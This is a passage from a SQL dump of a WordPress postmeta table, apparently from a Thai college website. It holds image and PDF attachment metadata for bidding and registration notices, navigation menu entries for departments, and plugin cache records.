(3621, 1061, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:725;s:6:\"height\";i:1024;s:4:\"file\";s:33:\"2018/01/e-bidding-4-item-2561.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:33:\"e-bidding-4-item-2561-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:33:\"e-bidding-4-item-2561-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:34:\"e-bidding-4-item-2561-725x1024.jpg\";s:5:\"width\";i:725;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:33:\"e-bidding-4-item-2561-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3626, 1065, '_wp_attached_file', '2018/01/register-online-2561-01.jpg'),
(3627, 1065, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:768;s:6:\"height\";i:1085;s:4:\"file\";s:35:\"2018/01/register-online-2561-01.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:35:\"register-online-2561-01-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:35:\"register-online-2561-01-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:36:\"register-online-2561-01-768x1085.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1085;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:36:\"register-online-2561-01-725x1024.jpg\";s:5:\"width\";i:725;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:35:\"register-online-2561-01-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3628, 1066, '_wp_attached_file', '2018/01/register-online-2561-02.jpg'),
(3629, 1066, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:768;s:6:\"height\";i:1085;s:4:\"file\";s:35:\"2018/01/register-online-2561-02.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:35:\"register-online-2561-02-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:35:\"register-online-2561-02-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:36:\"register-online-2561-02-768x1085.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1085;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:36:\"register-online-2561-02-725x1024.jpg\";s:5:\"width\";i:725;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:35:\"register-online-2561-02-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3630, 1067, '_wp_attached_file', '2018/01/register-online-2561-03.jpg'),
(3631, 1067, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:768;s:6:\"height\";i:1085;s:4:\"file\";s:35:\"2018/01/register-online-2561-03.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:35:\"register-online-2561-03-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:35:\"register-online-2561-03-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:36:\"register-online-2561-03-768x1085.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1085;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:36:\"register-online-2561-03-725x1024.jpg\";s:5:\"width\";i:725;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:35:\"register-online-2561-03-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3644, 1073, '_wp_attached_file', '2018/02/tender-e-bidding1.jpg'),
(3645, 1073, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1656;s:6:\"height\";i:2339;s:4:\"file\";s:29:\"2018/02/tender-e-bidding1.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"tender-e-bidding1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"tender-e-bidding1-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:30:\"tender-e-bidding1-768x1085.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1085;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:30:\"tender-e-bidding1-725x1024.jpg\";s:5:\"width\";i:725;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:29:\"tender-e-bidding1-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(3646, 1074, '_wp_attached_file', '2018/02/tender-e-bidding2.jpg'),
(3647, 1074, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1656;s:6:\"height\";i:2339;s:4:\"file\";s:29:\"2018/02/tender-e-bidding2.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"tender-e-bidding2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"tender-e-bidding2-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:30:\"tender-e-bidding2-768x1085.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1085;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:30:\"tender-e-bidding2-725x1024.jpg\";s:5:\"width\";i:725;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:29:\"tender-e-bidding2-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(3654, 754, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575690964;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:5589;}i:1;a:1:{s:2:\"id\";i:5680;}i:2;a:1:{s:2:\"id\";i:5830;}}}}'),
(3656, 752, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1572302925;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:5589;}i:1;a:1:{s:2:\"id\";i:5952;}i:2;a:1:{s:2:\"id\";i:5680;}}}}'),
(3657, 750, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575300363;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:5994;}i:1;a:1:{s:2:\"id\";i:4971;}i:2;a:1:{s:2:\"id\";i:4751;}}}}'),
(3658, 1082, '_edit_lock', '1519628289:3'),
(3659, 1082, '_edit_last', '3'),
(3660, 1083, '_wp_attached_file', '2018/02/Detail-of-durable-articles-.pdf'),
(3661, 1082, '_hide_featured', NULL),
(3662, 1082, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1572810350;s:7:\"payload\";a:0:{}}}'),
(3666, 1082, '_wpas_done_all', '1'),
(3669, 1091, '_edit_lock', '1529390473:3'),
(3670, 1091, '_edit_last', '3'),
(3671, 1092, '_wp_attached_file', '2018/02/15-2-2561-16-21-21.jpg'),
(3672, 1092, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:835;s:6:\"height\";i:623;s:4:\"file\";s:30:\"2018/02/15-2-2561-16-21-21.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"15-2-2561-16-21-21-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"15-2-2561-16-21-21-300x224.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:224;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:30:\"15-2-2561-16-21-21-768x573.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:573;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:30:\"15-2-2561-16-21-21-400x298.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:298;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3673, 1091, '_publicize_pending', '1'),
(3674, 1091, '_hide_featured', NULL),
(3675, 1098, '_edit_lock', '1529390787:3'),
(3676, 1098, '_edit_last', '3'),
(3677, 1099, '_wp_attached_file', '2018/02/16-2-2561-10-06-07.jpg'),
(3678, 1099, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:815;s:6:\"height\";i:607;s:4:\"file\";s:30:\"2018/02/16-2-2561-10-06-07.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"16-2-2561-10-06-07-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"16-2-2561-10-06-07-300x223.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:223;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:30:\"16-2-2561-10-06-07-768x572.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:572;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:30:\"16-2-2561-10-06-07-400x298.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:298;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3679, 1098, '_hide_featured', NULL),
(3680, 1098, '_publicize_pending', '1'),
(3681, 1103, '_edit_lock', '1529390850:3'),
(3682, 1103, '_edit_last', '3'),
(3683, 1104, '_wp_attached_file', '2018/02/16-2-2561-10-33-35.jpg'),
(3684, 1104, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:804;s:6:\"height\";i:600;s:4:\"file\";s:30:\"2018/02/16-2-2561-10-33-35.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"16-2-2561-10-33-35-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"16-2-2561-10-33-35-300x224.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:224;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:30:\"16-2-2561-10-33-35-768x573.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:573;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:30:\"16-2-2561-10-33-35-400x300.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3685, 1103, '_publicize_pending', '1'),
(3686, 1103, '_hide_featured', NULL),
(3687, 1109, '_edit_lock', '1529391119:3'),
(3688, 1109, '_edit_last', '3'),
(3691, 1109, '_publicize_pending', '1'),
(3692, 1109, '_hide_featured', NULL),
(3693, 1115, '_menu_item_type', 'custom'),
(3694, 1115, '_menu_item_menu_item_parent', '859'),
(3695, 1115, '_menu_item_object_id', '1115'),
(3696, 1115, '_menu_item_object', 'custom'),
(3697, 1115, '_menu_item_target', ''),
(3698, 1115, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(3699, 1115, '_menu_item_xfn', ''),
(3700, 1115, '_menu_item_url', '#'),
(3702, 1116, '_menu_item_type', 'custom'),
(3703, 1116, '_menu_item_menu_item_parent', '859'),
(3704, 1116, '_menu_item_object_id', '1116'),
(3705, 1116, '_menu_item_object', 'custom'),
(3706, 1116, '_menu_item_target', ''),
(3707, 1116, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(3708, 1116, '_menu_item_xfn', ''),
(3709, 1116, '_menu_item_url', '#'),
(3720, 1118, '_menu_item_type', 'custom'),
(3721, 1118, '_menu_item_menu_item_parent', '859'),
(3722, 1118, '_menu_item_object_id', '1118'),
(3723, 1118, '_menu_item_object', 'custom'),
(3724, 1118, '_menu_item_target', ''),
(3725, 1118, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(3726, 1118, '_menu_item_xfn', ''),
(3727, 1118, '_menu_item_url', '#'),
(3729, 1119, '_menu_item_type', 'custom'),
(3730, 1119, '_menu_item_menu_item_parent', '859'),
(3731, 1119, '_menu_item_object_id', '1119'),
(3732, 1119, '_menu_item_object', 'custom'),
(3733, 1119, '_menu_item_target', ''),
(3734, 1119, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(3735, 1119, '_menu_item_xfn', ''),
(3736, 1119, '_menu_item_url', '#'),
(3738, 1121, '_menu_item_type', 'custom'),
(3739, 1121, '_menu_item_menu_item_parent', '1115'),
(3740, 1121, '_menu_item_object_id', '1121'),
(3741, 1121, '_menu_item_object', 'custom'),
(3742, 1121, '_menu_item_target', ''),
(3743, 1121, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(3744, 1121, '_menu_item_xfn', ''),
(3745, 1121, '_menu_item_url', '/เครื่องมือวัดและควบคุม'),
(3747, 1122, '_menu_item_type', 'custom'),
(3748, 1122, '_menu_item_menu_item_parent', '1115'),
(3749, 1122, '_menu_item_object_id', '1122'),
(3750, 1122, '_menu_item_object', 'custom'),
(3751, 1122, '_menu_item_target', ''),
(3752, 1122, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(3753, 1122, '_menu_item_xfn', ''),
(3754, 1122, '_menu_item_url', '/ปิโตรเคมี'),
(3756, 1123, '_menu_item_type', 'custom'),
(3757, 1123, '_menu_item_menu_item_parent', '1115'),
(3758, 1123, '_menu_item_object_id', '1123'),
(3759, 1123, '_menu_item_object', 'custom'),
(3760, 1123, '_menu_item_target', ''),
(3761, 1123, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(3762, 1123, '_menu_item_xfn', ''),
(3763, 1123, '_menu_item_url', '/เคมีอุตสาหกรรม'),
(3765, 1124, '_menu_item_type', 'custom'),
(3766, 1124, '_menu_item_menu_item_parent', '1115'),
(3767, 1124, '_menu_item_object_id', '1124'),
(3768, 1124, '_menu_item_object', 'custom'),
(3769, 1124, '_menu_item_target', ''),
(3770, 1124, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(3771, 1124, '_menu_item_xfn', ''),
(3772, 1124, '_menu_item_url', '/เทคโนโลยียางและพอลิเมอ'),
(3776, 1128, '_menu_item_type', 'custom'),
(3777, 1128, '_menu_item_menu_item_parent', '859'),
(3778, 1128, '_menu_item_object_id', '1128'),
(3779, 1128, '_menu_item_object', 'custom'),
(3780, 1128, '_menu_item_target', ''),
(3781, 1128, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(3782, 1128, '_menu_item_xfn', ''),
(3783, 1128, '_menu_item_url', '#'),
(3785, 1129, '_menu_item_type', 'custom'),
(3786, 1129, '_menu_item_menu_item_parent', '1128'),
(3787, 1129, '_menu_item_object_id', '1129'),
(3788, 1129, '_menu_item_object', 'custom'),
(3789, 1129, '_menu_item_target', ''),
(3790, 1129, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(3791, 1129, '_menu_item_xfn', ''),
(3792, 1129, '_menu_item_url', '/เทคโนโลยีสารสนเทศ'),
(3794, 1130, '_wp_attached_file', '2018/02/ประกาศการเปิดภาคฤดูร้อน2560.pdf'),
(3795, 1115, '_publicize_pending', '1'),
(3796, 1121, '_publicize_pending', '1'),
(3797, 1122, '_publicize_pending', '1'),
(3798, 1123, '_publicize_pending', '1'),
(3799, 1124, '_publicize_pending', '1'),
(3800, 1116, '_publicize_pending', '1'),
(3802, 1118, '_publicize_pending', '1'),
(3803, 1119, '_publicize_pending', '1'),
(3804, 1128, '_publicize_pending', '1'),
(3805, 1129, '_publicize_pending', '1'),
(3806, 1131, '_wp_attached_file', '2018/02/แก้ไขประกาศการเปิดภาคฤดูร้อน.pdf'),
(3814, 1134, '_menu_item_type', 'custom'),
(3815, 1134, '_menu_item_menu_item_parent', '226'),
(3816, 1134, '_menu_item_object_id', '1134'),
(3817, 1134, '_menu_item_object', 'custom'),
(3818, 1134, '_menu_item_target', ''),
(3819, 1134, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(3820, 1134, '_menu_item_xfn', ''),
(3821, 1134, '_menu_item_url', '/งานบริหารงานทั่วไป'),
(3823, 1135, '_menu_item_type', 'custom'),
(3824, 1135, '_menu_item_menu_item_parent', '226'),
(3825, 1135, '_menu_item_object_id', '1135'),
(3826, 1135, '_menu_item_object', 'custom'),
(3827, 1135, '_menu_item_target', ''),
(3828, 1135, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(3829, 1135, '_menu_item_xfn', ''),
(3830, 1135, '_menu_item_url', '/งานการเงิน'),
(3832, 1136, '_menu_item_type', 'custom'),
(3833, 1136, '_menu_item_menu_item_parent', '226'),
(3834, 1136, '_menu_item_object_id', '1136'),
(3835, 1136, '_menu_item_object', 'custom'),
(3836, 1136, '_menu_item_target', ''),
(3837, 1136, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(3838, 1136, '_menu_item_xfn', '');
INSERT INTO `wp_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(3839, 1136, '_menu_item_url', '/งานการบัญชี'),
(3841, 1137, '_menu_item_type', 'custom'),
(3842, 1137, '_menu_item_menu_item_parent', '226'),
(3843, 1137, '_menu_item_object_id', '1137'),
(3844, 1137, '_menu_item_object', 'custom'),
(3845, 1137, '_menu_item_target', ''),
(3846, 1137, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(3847, 1137, '_menu_item_xfn', ''),
(3848, 1137, '_menu_item_url', '/งานพัสดุ'),
(3850, 1138, '_menu_item_type', 'custom'),
(3851, 1138, '_menu_item_menu_item_parent', '226'),
(3852, 1138, '_menu_item_object_id', '1138'),
(3853, 1138, '_menu_item_object', 'custom'),
(3854, 1138, '_menu_item_target', ''),
(3855, 1138, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(3856, 1138, '_menu_item_xfn', ''),
(3857, 1138, '_menu_item_url', '/งานอาคารสถานที่'),
(3861, 1140, '_menu_item_type', 'custom'),
(3862, 1140, '_menu_item_menu_item_parent', '226'),
(3863, 1140, '_menu_item_object_id', '1140'),
(3864, 1140, '_menu_item_object', 'custom'),
(3865, 1140, '_menu_item_target', ''),
(3866, 1140, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(3867, 1140, '_menu_item_xfn', ''),
(3868, 1140, '_menu_item_url', '/งานทะเบียน'),
(3870, 1141, '_menu_item_type', 'custom'),
(3871, 1141, '_menu_item_menu_item_parent', '226'),
(3872, 1141, '_menu_item_object_id', '1141'),
(3873, 1141, '_menu_item_object', 'custom'),
(3874, 1141, '_menu_item_target', ''),
(3875, 1141, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(3876, 1141, '_menu_item_xfn', ''),
(3877, 1141, '_menu_item_url', '/งานประชาสัมพันธ์'),
(3879, 1134, '_publicize_pending', '1'),
(3880, 1135, '_publicize_pending', '1'),
(3881, 1136, '_publicize_pending', '1'),
(3882, 1137, '_publicize_pending', '1'),
(3883, 1138, '_publicize_pending', '1'),
(3884, 1140, '_publicize_pending', '1'),
(3885, 1141, '_publicize_pending', '1'),
(3886, 1143, '_menu_item_type', 'custom'),
(3887, 1143, '_menu_item_menu_item_parent', '225'),
(3888, 1143, '_menu_item_object_id', '1143'),
(3889, 1143, '_menu_item_object', 'custom'),
(3890, 1143, '_menu_item_target', ''),
(3891, 1143, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(3892, 1143, '_menu_item_xfn', ''),
(3893, 1143, '_menu_item_url', '/งานวางแผนและงบประมาณ'),
(3898, 1144, '_menu_item_type', 'custom'),
(3899, 1144, '_menu_item_menu_item_parent', '225'),
(3900, 1144, '_menu_item_object_id', '1144'),
(3901, 1144, '_menu_item_object', 'custom'),
(3902, 1144, '_menu_item_target', ''),
(3903, 1144, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(3904, 1144, '_menu_item_xfn', ''),
(3905, 1144, '_menu_item_url', '/งานศูนย์ข้อมูล'),
(3907, 1146, '_menu_item_type', 'custom'),
(3908, 1146, '_menu_item_menu_item_parent', '225'),
(3909, 1146, '_menu_item_object_id', '1146'),
(3910, 1146, '_menu_item_object', 'custom'),
(3911, 1146, '_menu_item_target', ''),
(3912, 1146, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(3913, 1146, '_menu_item_xfn', ''),
(3914, 1146, '_menu_item_url', '/งานความร่วมมือ'),
(3917, 1147, '_menu_item_type', 'custom'),
(3918, 1147, '_menu_item_menu_item_parent', '225'),
(3919, 1147, '_menu_item_object_id', '1147'),
(3920, 1147, '_menu_item_object', 'custom'),
(3921, 1147, '_menu_item_target', ''),
(3922, 1147, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(3923, 1147, '_menu_item_xfn', ''),
(3924, 1147, '_menu_item_url', '/งานวิจัย-พัฒนา-นวัตกรรม'),
(3926, 1148, '_menu_item_type', 'custom'),
(3927, 1148, '_menu_item_menu_item_parent', '225'),
(3928, 1148, '_menu_item_object_id', '1148'),
(3929, 1148, '_menu_item_object', 'custom'),
(3930, 1148, '_menu_item_target', ''),
(3931, 1148, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(3932, 1148, '_menu_item_xfn', ''),
(3933, 1148, '_menu_item_url', '/งานประกันคุณภาพและมาตร'),
(3935, 1149, '_menu_item_type', 'custom'),
(3936, 1149, '_menu_item_menu_item_parent', '225'),
(3937, 1149, '_menu_item_object_id', '1149'),
(3938, 1149, '_menu_item_object', 'custom'),
(3939, 1149, '_menu_item_target', ''),
(3940, 1149, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(3941, 1149, '_menu_item_xfn', ''),
(3942, 1149, '_menu_item_url', '/งานส่งเสริมผลิตผล-การค้'),
(3944, 1143, '_publicize_pending', '1'),
(3945, 1144, '_publicize_pending', '1'),
(3946, 1146, '_publicize_pending', '1'),
(3947, 1147, '_publicize_pending', '1'),
(3948, 1148, '_publicize_pending', '1'),
(3949, 1149, '_publicize_pending', '1'),
(3950, 1150, '_edit_lock', '1518769310:3'),
(3951, 1150, '_edit_last', '3'),
(3955, 1150, '_hide_featured', NULL),
(3956, 1150, '_wpas_done_all', '1'),
(3962, 1150, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575542159;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:4735;}i:1;a:1:{s:2:\"id\";i:4020;}i:2;a:1:{s:2:\"id\";i:4668;}}}}'),
